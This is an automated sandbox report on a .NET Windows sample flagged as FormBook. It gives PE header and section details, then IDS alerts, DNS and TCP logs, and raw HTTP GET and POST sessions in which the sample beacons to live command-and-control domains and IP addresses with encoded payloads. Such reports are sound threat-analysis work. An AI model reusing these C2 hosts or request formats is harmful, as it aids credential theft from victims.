                                                            SSDEEP:12288:rPIlO3RbeX893TStEq2T7zti9LFqK3kvU7uWJgxmG5EKEYEs5FR1AkcSEcRwoNG+:rQlO35eX8932y7ti9j3JS8gIwEKEds5K
                                                            TLSH:1AF412213379AB72D6BE47F89A14638007F1A4176235E7480F8BE1EB1A97F168931F17
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...X.................0.............z.... ........@.. ....................... ............@................................

                                                            File Icon

                                                            Icon Hash:00928e8e8686b000

                                                            Static PE Info

                                                            General

                                                            Entrypoint:0x4bc37a
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0xF3BAF958 [Thu Jul 30 17:50:16 2099 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                            Entrypoint Preview

                                                            Instruction
                                                            jmp dword ptr [00402000h]
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al

                                                            Data Directories

                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xbc3270x4f.text
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xbe0000x628.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xc00000xc.reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0xb98d80x70.text
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                            Sections

                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x20000xba3800xba4006305cf8ee3913a8d6fc95c920d244425False0.950668519295302data7.942639726228952IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rsrc0xbe0000x6280x800be7c4b997e932218ca19391b3b21da6cFalse0.33935546875data3.4648181731470697IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .reloc0xc00000xc0x200fc2c0954981b48792a291a5529af71b3False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                            Resources

                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            RT_VERSION0xbe0900x398OpenPGP Public Key0.4206521739130435
                                                            RT_MANIFEST0xbe4380x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                            Imports

                                                            DLLImport
                                                            mscoree.dll_CorExeMain

                                                            Network Behavior

                                                            Suricata IDS Alerts

                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                            2024-11-25T10:51:13.632871+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.949874161.97.142.14480TCP
                                                            2024-11-25T10:51:13.632871+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.949874161.97.142.14480TCP
                                                            2024-11-25T10:51:31.821289+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.949913107.155.56.3080TCP
                                                            2024-11-25T10:51:34.477690+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.949921107.155.56.3080TCP
                                                            2024-11-25T10:51:37.258859+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.949927107.155.56.3080TCP
                                                            2024-11-25T10:51:39.964629+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.949933107.155.56.3080TCP
                                                            2024-11-25T10:51:39.964629+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.949933107.155.56.3080TCP
                                                            2024-11-25T10:51:47.868179+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.94995313.228.81.3980TCP
                                                            2024-11-25T10:51:50.524880+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.94995913.228.81.3980TCP
                                                            2024-11-25T10:51:53.180646+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.94996613.228.81.3980TCP
                                                            2024-11-25T10:51:55.962213+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.94997213.228.81.3980TCP
                                                            2024-11-25T10:51:55.962213+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.94997213.228.81.3980TCP

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Nov 25, 2024 10:51:12.267729044 CET4987480192.168.2.9161.97.142.144
                                                            Nov 25, 2024 10:51:12.387258053 CET8049874161.97.142.144192.168.2.9
                                                            Nov 25, 2024 10:51:12.387454033 CET4987480192.168.2.9161.97.142.144
                                                            Nov 25, 2024 10:51:12.396907091 CET4987480192.168.2.9161.97.142.144
                                                            Nov 25, 2024 10:51:12.516549110 CET8049874161.97.142.144192.168.2.9
                                                            Nov 25, 2024 10:51:13.632708073 CET8049874161.97.142.144192.168.2.9
                                                            Nov 25, 2024 10:51:13.632735968 CET8049874161.97.142.144192.168.2.9
                                                            Nov 25, 2024 10:51:13.632747889 CET8049874161.97.142.144192.168.2.9
                                                            Nov 25, 2024 10:51:13.632787943 CET8049874161.97.142.144192.168.2.9
                                                            Nov 25, 2024 10:51:13.632870913 CET4987480192.168.2.9161.97.142.144
                                                            Nov 25, 2024 10:51:13.632870913 CET4987480192.168.2.9161.97.142.144
                                                            Nov 25, 2024 10:51:13.638792992 CET4987480192.168.2.9161.97.142.144
                                                            Nov 25, 2024 10:51:13.758903027 CET8049874161.97.142.144192.168.2.9
                                                            Nov 25, 2024 10:51:30.172593117 CET4991380192.168.2.9107.155.56.30
                                                            Nov 25, 2024 10:51:30.292460918 CET8049913107.155.56.30192.168.2.9
                                                            Nov 25, 2024 10:51:30.292696953 CET4991380192.168.2.9107.155.56.30
                                                            Nov 25, 2024 10:51:30.313256979 CET4991380192.168.2.9107.155.56.30
                                                            Nov 25, 2024 10:51:30.432832956 CET8049913107.155.56.30192.168.2.9
                                                            Nov 25, 2024 10:51:31.821289062 CET4991380192.168.2.9107.155.56.30
                                                            Nov 25, 2024 10:51:31.856654882 CET8049913107.155.56.30192.168.2.9
                                                            Nov 25, 2024 10:51:31.856669903 CET8049913107.155.56.30192.168.2.9
                                                            Nov 25, 2024 10:51:31.856755018 CET4991380192.168.2.9107.155.56.30
                                                            Nov 25, 2024 10:51:31.856854916 CET4991380192.168.2.9107.155.56.30
                                                            Nov 25, 2024 10:51:31.941046000 CET8049913107.155.56.30192.168.2.9
                                                            Nov 25, 2024 10:51:31.941099882 CET4991380192.168.2.9107.155.56.30
                                                            Nov 25, 2024 10:51:32.840255976 CET4992180192.168.2.9107.155.56.30
                                                            Nov 25, 2024 10:51:32.959949970 CET8049921107.155.56.30192.168.2.9
                                                            Nov 25, 2024 10:51:32.960026026 CET4992180192.168.2.9107.155.56.30
                                                            Nov 25, 2024 10:51:32.976150036 CET4992180192.168.2.9107.155.56.30
                                                            Nov 25, 2024 10:51:33.095786095 CET8049921107.155.56.30192.168.2.9
                                                            Nov 25, 2024 10:51:34.477689981 CET4992180192.168.2.9107.155.56.30
                                                            Nov 25, 2024 10:51:34.597451925 CET8049921107.155.56.30192.168.2.9
                                                            Nov 25, 2024 10:51:34.597667933 CET4992180192.168.2.9107.155.56.30
                                                            Nov 25, 2024 10:51:35.496594906 CET4992780192.168.2.9107.155.56.30
                                                            Nov 25, 2024 10:51:35.738806963 CET8049927107.155.56.30192.168.2.9
                                                            Nov 25, 2024 10:51:35.738918066 CET4992780192.168.2.9107.155.56.30
                                                            Nov 25, 2024 10:51:35.753143072 CET4992780192.168.2.9107.155.56.30
                                                            Nov 25, 2024 10:51:35.872821093 CET8049927107.155.56.30192.168.2.9
                                                            Nov 25, 2024 10:51:35.872879028 CET8049927107.155.56.30192.168.2.9
                                                            Nov 25, 2024 10:51:37.258858919 CET4992780192.168.2.9107.155.56.30
                                                            Nov 25, 2024 10:51:37.297677994 CET8049927107.155.56.30192.168.2.9
                                                            Nov 25, 2024 10:51:37.297732115 CET4992780192.168.2.9107.155.56.30
                                                            Nov 25, 2024 10:51:37.378676891 CET8049927107.155.56.30192.168.2.9
                                                            Nov 25, 2024 10:51:37.378751040 CET4992780192.168.2.9107.155.56.30
                                                            Nov 25, 2024 10:51:38.277864933 CET4993380192.168.2.9107.155.56.30
                                                            Nov 25, 2024 10:51:38.397605896 CET8049933107.155.56.30192.168.2.9
                                                            Nov 25, 2024 10:51:38.397886038 CET4993380192.168.2.9107.155.56.30
                                                            Nov 25, 2024 10:51:38.406712055 CET4993380192.168.2.9107.155.56.30
                                                            Nov 25, 2024 10:51:38.527431965 CET8049933107.155.56.30192.168.2.9
                                                            Nov 25, 2024 10:51:39.964409113 CET8049933107.155.56.30192.168.2.9
                                                            Nov 25, 2024 10:51:39.964445114 CET8049933107.155.56.30192.168.2.9
                                                            Nov 25, 2024 10:51:39.964458942 CET8049933107.155.56.30192.168.2.9
                                                            Nov 25, 2024 10:51:39.964494944 CET8049933107.155.56.30192.168.2.9
                                                            Nov 25, 2024 10:51:39.964505911 CET8049933107.155.56.30192.168.2.9
                                                            Nov 25, 2024 10:51:39.964517117 CET8049933107.155.56.30192.168.2.9
                                                            Nov 25, 2024 10:51:39.964524031 CET8049933107.155.56.30192.168.2.9
                                                            Nov 25, 2024 10:51:39.964628935 CET4993380192.168.2.9107.155.56.30
                                                            Nov 25, 2024 10:51:39.964673042 CET8049933107.155.56.30192.168.2.9
                                                            Nov 25, 2024 10:51:39.964687109 CET8049933107.155.56.30192.168.2.9
                                                            Nov 25, 2024 10:51:39.964694023 CET8049933107.155.56.30192.168.2.9
                                                            Nov 25, 2024 10:51:39.964714050 CET4993380192.168.2.9107.155.56.30
                                                            Nov 25, 2024 10:51:39.964726925 CET4993380192.168.2.9107.155.56.30
                                                            Nov 25, 2024 10:51:39.964760065 CET4993380192.168.2.9107.155.56.30
                                                            Nov 25, 2024 10:51:39.971903086 CET4993380192.168.2.9107.155.56.30
                                                            Nov 25, 2024 10:51:40.091737986 CET8049933107.155.56.30192.168.2.9
                                                            Nov 25, 2024 10:51:46.219342947 CET4995380192.168.2.913.228.81.39
                                                            Nov 25, 2024 10:51:46.338819027 CET804995313.228.81.39192.168.2.9
                                                            Nov 25, 2024 10:51:46.339020967 CET4995380192.168.2.913.228.81.39
                                                            Nov 25, 2024 10:51:46.353514910 CET4995380192.168.2.913.228.81.39
                                                            Nov 25, 2024 10:51:46.473218918 CET804995313.228.81.39192.168.2.9
                                                            Nov 25, 2024 10:51:47.868179083 CET4995380192.168.2.913.228.81.39
                                                            Nov 25, 2024 10:51:47.935400009 CET804995313.228.81.39192.168.2.9
                                                            Nov 25, 2024 10:51:47.935487032 CET804995313.228.81.39192.168.2.9
                                                            Nov 25, 2024 10:51:47.935518026 CET4995380192.168.2.913.228.81.39
                                                            Nov 25, 2024 10:51:47.935585976 CET4995380192.168.2.913.228.81.39
                                                            Nov 25, 2024 10:51:47.987713099 CET804995313.228.81.39192.168.2.9
                                                            Nov 25, 2024 10:51:47.987792969 CET4995380192.168.2.913.228.81.39
                                                            Nov 25, 2024 10:51:48.887262106 CET4995980192.168.2.913.228.81.39
                                                            Nov 25, 2024 10:51:49.007340908 CET804995913.228.81.39192.168.2.9
                                                            Nov 25, 2024 10:51:49.007488012 CET4995980192.168.2.913.228.81.39
                                                            Nov 25, 2024 10:51:49.021966934 CET4995980192.168.2.913.228.81.39
                                                            Nov 25, 2024 10:51:49.141412973 CET804995913.228.81.39192.168.2.9
                                                            Nov 25, 2024 10:51:50.524879932 CET4995980192.168.2.913.228.81.39
                                                            Nov 25, 2024 10:51:50.645025969 CET804995913.228.81.39192.168.2.9
                                                            Nov 25, 2024 10:51:50.645129919 CET4995980192.168.2.913.228.81.39
                                                            Nov 25, 2024 10:51:51.543445110 CET4996680192.168.2.913.228.81.39
                                                            Nov 25, 2024 10:51:51.663220882 CET804996613.228.81.39192.168.2.9
                                                            Nov 25, 2024 10:51:51.663352966 CET4996680192.168.2.913.228.81.39
                                                            Nov 25, 2024 10:51:51.677752018 CET4996680192.168.2.913.228.81.39
                                                            Nov 25, 2024 10:51:51.797270060 CET804996613.228.81.39192.168.2.9
                                                            Nov 25, 2024 10:51:51.797347069 CET804996613.228.81.39192.168.2.9
                                                            Nov 25, 2024 10:51:53.180645943 CET4996680192.168.2.913.228.81.39
                                                            Nov 25, 2024 10:51:53.300337076 CET804996613.228.81.39192.168.2.9
                                                            Nov 25, 2024 10:51:53.300393105 CET4996680192.168.2.913.228.81.39
                                                            Nov 25, 2024 10:51:54.199697018 CET4997280192.168.2.913.228.81.39
                                                            Nov 25, 2024 10:51:54.319350958 CET804997213.228.81.39192.168.2.9
                                                            Nov 25, 2024 10:51:54.319488049 CET4997280192.168.2.913.228.81.39
                                                            Nov 25, 2024 10:51:54.332039118 CET4997280192.168.2.913.228.81.39
                                                            Nov 25, 2024 10:51:54.451522112 CET804997213.228.81.39192.168.2.9
                                                            Nov 25, 2024 10:51:55.961998940 CET804997213.228.81.39192.168.2.9
                                                            Nov 25, 2024 10:51:55.962148905 CET804997213.228.81.39192.168.2.9
                                                            Nov 25, 2024 10:51:55.962213039 CET4997280192.168.2.913.228.81.39
                                                            Nov 25, 2024 10:51:55.965632915 CET4997280192.168.2.913.228.81.39
                                                            Nov 25, 2024 10:51:56.085086107 CET804997213.228.81.39192.168.2.9

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Nov 25, 2024 10:51:11.583209038 CET6068353192.168.2.91.1.1.1
                                                            Nov 25, 2024 10:51:12.260891914 CET53606831.1.1.1192.168.2.9
                                                            Nov 25, 2024 10:51:28.966015100 CET6369453192.168.2.91.1.1.1
                                                            Nov 25, 2024 10:51:29.977663994 CET6369453192.168.2.91.1.1.1
                                                            Nov 25, 2024 10:51:30.169820070 CET53636941.1.1.1192.168.2.9
                                                            Nov 25, 2024 10:51:30.169836998 CET53636941.1.1.1192.168.2.9
                                                            Nov 25, 2024 10:51:44.981384993 CET5172853192.168.2.91.1.1.1
                                                            Nov 25, 2024 10:51:45.993177891 CET5172853192.168.2.91.1.1.1
                                                            Nov 25, 2024 10:51:46.216439962 CET53517281.1.1.1192.168.2.9
                                                            Nov 25, 2024 10:51:46.216450930 CET53517281.1.1.1192.168.2.9
                                                            Nov 25, 2024 10:52:00.981653929 CET5372053192.168.2.91.1.1.1
                                                            Nov 25, 2024 10:52:01.264401913 CET53537201.1.1.1192.168.2.9

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Nov 25, 2024 10:51:11.583209038 CET192.168.2.91.1.1.10x5745Standard query (0)www.070001325.xyzA (IP address)IN (0x0001)false
                                                            Nov 25, 2024 10:51:28.966015100 CET192.168.2.91.1.1.10xdcf1Standard query (0)www.expancz.topA (IP address)IN (0x0001)false
                                                            Nov 25, 2024 10:51:29.977663994 CET192.168.2.91.1.1.10xdcf1Standard query (0)www.expancz.topA (IP address)IN (0x0001)false
                                                            Nov 25, 2024 10:51:44.981384993 CET192.168.2.91.1.1.10xf5d8Standard query (0)www.taxiquynhonnew.clickA (IP address)IN (0x0001)false
                                                            Nov 25, 2024 10:51:45.993177891 CET192.168.2.91.1.1.10xf5d8Standard query (0)www.taxiquynhonnew.clickA (IP address)IN (0x0001)false
                                                            Nov 25, 2024 10:52:00.981653929 CET192.168.2.91.1.1.10x9dd6Standard query (0)www.epitomize.shopA (IP address)IN (0x0001)false

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Nov 25, 2024 10:49:55.792332888 CET1.1.1.1192.168.2.90xe6d2No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                            Nov 25, 2024 10:49:55.792332888 CET1.1.1.1192.168.2.90xe6d2No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                            Nov 25, 2024 10:51:12.260891914 CET1.1.1.1192.168.2.90x5745No error (0)www.070001325.xyz161.97.142.144A (IP address)IN (0x0001)false
                                                            Nov 25, 2024 10:51:30.169820070 CET1.1.1.1192.168.2.90xdcf1No error (0)www.expancz.top107.155.56.30A (IP address)IN (0x0001)false
                                                            Nov 25, 2024 10:51:30.169836998 CET1.1.1.1192.168.2.90xdcf1No error (0)www.expancz.top107.155.56.30A (IP address)IN (0x0001)false
                                                            Nov 25, 2024 10:51:46.216439962 CET1.1.1.1192.168.2.90xf5d8No error (0)www.taxiquynhonnew.clickdns.ladipage.comCNAME (Canonical name)IN (0x0001)false
                                                            Nov 25, 2024 10:51:46.216439962 CET1.1.1.1192.168.2.90xf5d8No error (0)dns.ladipage.com13.228.81.39A (IP address)IN (0x0001)false
                                                            Nov 25, 2024 10:51:46.216439962 CET1.1.1.1192.168.2.90xf5d8No error (0)dns.ladipage.com18.139.62.226A (IP address)IN (0x0001)false
                                                            Nov 25, 2024 10:51:46.216450930 CET1.1.1.1192.168.2.90xf5d8No error (0)www.taxiquynhonnew.clickdns.ladipage.comCNAME (Canonical name)IN (0x0001)false
                                                            Nov 25, 2024 10:51:46.216450930 CET1.1.1.1192.168.2.90xf5d8No error (0)dns.ladipage.com13.228.81.39A (IP address)IN (0x0001)false
                                                            Nov 25, 2024 10:51:46.216450930 CET1.1.1.1192.168.2.90xf5d8No error (0)dns.ladipage.com18.139.62.226A (IP address)IN (0x0001)false
                                                            Nov 25, 2024 10:52:01.264401913 CET1.1.1.1192.168.2.90x9dd6Name error (3)www.epitomize.shopnonenoneA (IP address)IN (0x0001)false

                                                            HTTP Request Dependency Graph

                                                            • www.070001325.xyz
                                                            • www.expancz.top
                                                            • www.taxiquynhonnew.click

                                                            HTTP Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.949874161.97.142.144806784C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 25, 2024 10:51:12.396907091 CET536OUTGET /gebt/?Ap=KZH8jfU0&BzI0pR=vv4Z5oAEVW8Fnw5+v3rC78A1apnlABoa7eW6m5kMXrJjwDKHwLvNIdd6hCLbwWC7cjqqbjXxYb26MUHQV2edmwlqePdZlnBGcJVL9hTasAQSXzj69w== HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Host: www.070001325.xyz
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Nov 25, 2024 10:51:13.632708073 CET1236INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Mon, 25 Nov 2024 09:51:13 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Content-Length: 2966
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            ETag: "66cce1df-b96"
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
                                                            Nov 25, 2024 10:51:13.632735968 CET1236INData Raw: 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09
                                                            Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707
                                                            Nov 25, 2024 10:51:13.632747889 CET698INData Raw: 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e 36 32 37 20 30 20 31 32 2d 35 2e 33 37 33 20 31 32 2d 31 32 76 2d 31 2e 33 33 33 63 30 2d 32 38 2e 34 36 32 20 38 33 2e
                                                            Data Ascii: 941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0 12-5.373 12-12v-1.333c0-28.462 83.186-29.647 83.186-106.667 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.949913107.155.56.30806784C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 25, 2024 10:51:30.313256979 CET797OUTPOST /2gcl/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.expancz.top
                                                            Origin: http://www.expancz.top
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 195
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.expancz.top/2gcl/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Raw: 42 7a 49 30 70 52 3d 34 4b 4d 4d 57 76 4a 58 74 4e 49 44 78 33 4b 7a 73 6f 71 45 5a 64 74 68 31 76 42 58 57 71 48 55 58 54 75 39 45 2b 59 50 50 65 45 70 75 41 4a 49 7a 4c 76 73 47 62 62 2b 31 78 7a 78 51 56 63 38 74 4d 56 6b 55 38 62 61 34 49 6b 46 33 4d 44 63 31 74 4a 6f 41 75 7a 5a 36 67 45 4e 54 52 6f 69 65 6d 65 4f 4e 59 2f 70 63 54 67 49 52 66 58 72 69 4a 54 37 32 75 46 30 65 48 42 53 77 76 6d 78 4f 77 71 76 71 70 34 61 54 59 4b 79 6e 6f 4d 69 65 6e 66 42 47 36 4d 65 59 2b 63 50 34 70 6b 4c 54 43 31 6e 66 77 71 77 2b 36 4a 46 31 4f 30 68 73 72 53 62 6d 30 62 52 6c 36 78 44
